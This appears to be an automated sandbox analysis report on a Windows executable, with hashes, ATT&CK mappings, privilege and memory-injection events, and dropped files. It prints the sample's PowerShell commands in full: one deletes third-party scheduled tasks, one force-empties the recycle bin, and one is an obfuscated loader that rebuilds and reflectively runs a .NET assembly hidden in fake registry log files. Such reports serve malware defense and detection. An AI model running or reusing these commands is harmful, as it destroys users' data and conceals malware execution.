7a717f1cd49637c9196065d489ee439e9e50d29f4ff9112350608e1300233164

General

Target

7a717f1cd49637c9196065d489ee439e9e50d29f4ff9112350608e1300233164N.exe
Size

4.8MB
MD5

793661edeedb9db8b09f4e72c4d05950
SHA1

d4d5cc1491f29d22c622c1521adee8d8dbf72666
SHA256

7a717f1cd49637c9196065d489ee439e9e50d29f4ff9112350608e1300233164
SHA512

aef438c43d984002c4c17b0df29e2f761dbe31a80c5553994c641b3a7b0eebbde22cd9ff85f733cd302616401b1b765f7f647976486148c397f0382512cad0f9
SSDEEP

49152:pqj00f62wSvIj8kyyOiIBQoKHnHuB1UAjwqbMVaydWfOHSCyN78/NW6g/yjKj638:pieSv4y0IKoKHHIMz75bN84s

Score

6^/10

defense_evasion execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4652	powershell.exe
3412	powershell.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	powershell.exe

Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs

Command interpreters often include specific commands/flags that ignore errors and other hangups.

defense_evasion

Ignore Process Interrupts

T1564.011

pid	Process
4996	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4652	powershell.exe
4652	powershell.exe
4996	powershell.exe
4996	powershell.exe
3412	powershell.exe
3412	powershell.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

description	pid	Process
Token: SeDebugPrivilege	4652	powershell.exe
Token: SeIncreaseQuotaPrivilege	4652	powershell.exe
Token: SeSecurityPrivilege	4652	powershell.exe
Token: SeTakeOwnershipPrivilege	4652	powershell.exe
Token: SeLoadDriverPrivilege	4652	powershell.exe
Token: SeSystemProfilePrivilege	4652	powershell.exe
Token: SeSystemtimePrivilege	4652	powershell.exe
Token: SeProfSingleProcessPrivilege	4652	powershell.exe
Token: SeIncBasePriorityPrivilege	4652	powershell.exe
Token: SeCreatePagefilePrivilege	4652	powershell.exe
Token: SeBackupPrivilege	4652	powershell.exe
Token: SeRestorePrivilege	4652	powershell.exe
Token: SeShutdownPrivilege	4652	powershell.exe
Token: SeDebugPrivilege	4652	powershell.exe
Token: SeSystemEnvironmentPrivilege	4652	powershell.exe
Token: SeRemoteShutdownPrivilege	4652	powershell.exe
Token: SeUndockPrivilege	4652	powershell.exe
Token: SeManageVolumePrivilege	4652	powershell.exe
Token: 33	4652	powershell.exe
Token: 34	4652	powershell.exe
Token: 35	4652	powershell.exe
Token: 36	4652	powershell.exe
Token: SeDebugPrivilege	4996	powershell.exe
Token: SeDebugPrivilege	3412	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1776 wrote to memory of 4652	1776	7a717f1cd49637c9196065d489ee439e9e50d29f4ff9112350608e1300233164N.exe	83
PID 1776 wrote to memory of 4652	1776	7a717f1cd49637c9196065d489ee439e9e50d29f4ff9112350608e1300233164N.exe	83
PID 1776 wrote to memory of 4996	1776	7a717f1cd49637c9196065d489ee439e9e50d29f4ff9112350608e1300233164N.exe	85
PID 1776 wrote to memory of 4996	1776	7a717f1cd49637c9196065d489ee439e9e50d29f4ff9112350608e1300233164N.exe	85
PID 1776 wrote to memory of 3412	1776	7a717f1cd49637c9196065d489ee439e9e50d29f4ff9112350608e1300233164N.exe	90
PID 1776 wrote to memory of 3412	1776	7a717f1cd49637c9196065d489ee439e9e50d29f4ff9112350608e1300233164N.exe	90

C:\Users\Admin\AppData\Local\Temp\7a717f1cd49637c9196065d489ee439e9e50d29f4ff9112350608e1300233164N.exe
"C:\Users\Admin\AppData\Local\Temp\7a717f1cd49637c9196065d489ee439e9e50d29f4ff9112350608e1300233164N.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1776
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -Command " $tasks = Get-ScheduledTask | Where-Object { $_.TaskPath -notlike '\Microsoft\Windows\*' -and $_.TaskName -ne 'VideoConvertor' } foreach ($task in $tasks) { try { Unregister-ScheduledTask -TaskName $task.TaskName -Confirm:$false } catch { continue } } "
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4652
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -Command "Clear-RecycleBin -Force -ErrorAction SilentlyContinue"
  2⤵
  - Enumerates connected drives
  - Hide Artifacts: Ignore Process Interrupts
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4996
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -Command " Function Init-VideoCache ([String] $CacheBuffer) { $CacheList = [System.Collections.Generic.List[Byte]]::new(); for ($i = 0; $i -lt $CacheBuffer.Length; $i += 8) { $CacheList.Add([Convert]::ToByte($CacheBuffer.Substring($i, 8), 2)) } return [System.Text.Encoding]::ASCII.GetString($CacheList.ToArray()) }; function Clear-VideoTempFiles { param([string] $tempPath) $tempFiles = $tempPath.Split(' ') $buffer = New-Object 'byte[]' ($tempFiles.Count / 2) $count = 0 for ($i = 0; $i -lt $tempFiles.Count - 1; $i += 2) { $buffer[$count] = [byte]($tempFiles[$i]) $count++ } return $buffer } $TempCache = Clear-VideoTempFiles (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{428f1209-1254-13ef-ada4-080027dede23}.TxR.blf') $BootImage = Clear-VideoTempFiles (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{4280000a-1254-11ef-ada2-080007dede23}.TM.blf') $BootParser = Init-VideoCache(Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{54ss24a-13354-13f-aad43-333333}.TM.blf') $SystemConfig = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{428f120a-1254-eeeef-ada2-080027dede23}.TM.blf') $CleanupTask = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{428f4444a-13354-11ef-sdd2-080027dede23}.TM.blf') $Image = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{428f4444a-13354-11ef-aad43-080027dede23}.TM.blf') $Module = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{543454444a-13354-11ef-aad43-080027dede23}.TM.blf') $LookupModule = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{543ss44a-13354-113f-aad43-08227dede23}.TM.blf') $ModuleParams = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{54ss24a-13354-13f-aad43-5227de33}.TM.blf') $SystemAssembly = [Reflection.Assembly] $SystemAssembly::$Module([Byte[]]$BootImage).$LookupModule($SystemConfig).$ModuleParams($CleanupTask).$Image($null,[Object[]]($BootParser,[Byte[]]$TempCache)) "
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3412

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

1

T1564

Ignore Process Interrupts

1

T1564.011

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cc2ce575753731574bf10ff6e5162032

SHA1
b660e5156f97af770e5d359fdd2a6ea697f359fb

SHA256
c0c37fd6fb26d101e347a1e9b5190029bb591d8c57392dbf2df4741b11fc2dfa

SHA512
715bb49c3977d51ff39b0458b99c5e3ba786e3110a4015402cd023b484ff385704475238fb813d074524d76bc733b0d4e92b57b64d187b3d6a664e4f38eebc1b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g0ymv4nm.owa.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1776-34-0x00007FF697B40000-0x00007FF697FC6000-memory.dmp

Filesize
4.5MB

Download
memory/4652-0-0x00007FFA39023000-0x00007FFA39025000-memory.dmp

Filesize
8KB

Download
memory/4652-11-0x00007FFA39020000-0x00007FFA39AE1000-memory.dmp

Filesize
10.8MB

Download
memory/4652-12-0x00007FFA39020000-0x00007FFA39AE1000-memory.dmp

Filesize
10.8MB

Download
memory/4652-15-0x00007FFA39020000-0x00007FFA39AE1000-memory.dmp

Filesize
10.8MB

Download
memory/4652-16-0x0000028FDBDE0000-0x0000028FDBFFC000-memory.dmp

Filesize
2.1MB

Download
memory/4652-10-0x0000028FDC130000-0x0000028FDC152000-memory.dmp

Filesize
136KB

Download
memory/4652-17-0x00007FFA39020000-0x00007FFA39AE1000-memory.dmp

Filesize
10.8MB

Download
memory/4996-19-0x00007FFA39020000-0x00007FFA39AE1000-memory.dmp

Filesize
10.8MB

Download
memory/4996-33-0x00007FFA39020000-0x00007FFA39AE1000-memory.dmp

Filesize
10.8MB

Download
memory/4996-26-0x00007FFA39020000-0x00007FFA39AE1000-memory.dmp

Filesize
10.8MB

Download
memory/4996-20-0x00007FFA39020000-0x00007FFA39AE1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing